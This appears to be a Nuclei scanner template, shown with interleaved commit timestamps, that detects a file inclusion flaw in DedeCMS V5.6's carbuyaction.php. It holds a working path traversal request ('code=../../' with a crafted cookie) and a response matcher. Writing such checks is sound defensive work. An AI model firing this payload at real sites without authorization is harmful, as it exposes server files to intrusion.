2021-03-15 08:40:45 +00:00
id : dedecms-carbuyaction-fileinclude
info :
name : DedeCmsV5.6 Carbuyaction Fileinclude
author : pikpikcu
severity : high
2021-10-14 13:28:41 +00:00
description : A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter.
2021-03-15 08:40:45 +00:00
reference : https://www.cnblogs.com/milantgh/p/3615986.html
tags : dedecms
requests :
- method : GET
path :
- '{{BaseURL}}/plus/carbuyaction.php?dopost=return&code=../../'
headers :
Cookie : code=cod
2021-07-21 12:56:36 +00:00
redirects : true
2021-03-15 08:40:45 +00:00
matchers-condition : and
matchers :
- type : word
words :
- "Cod::respond()"
part : body
condition : and
- type : status
status :
- 200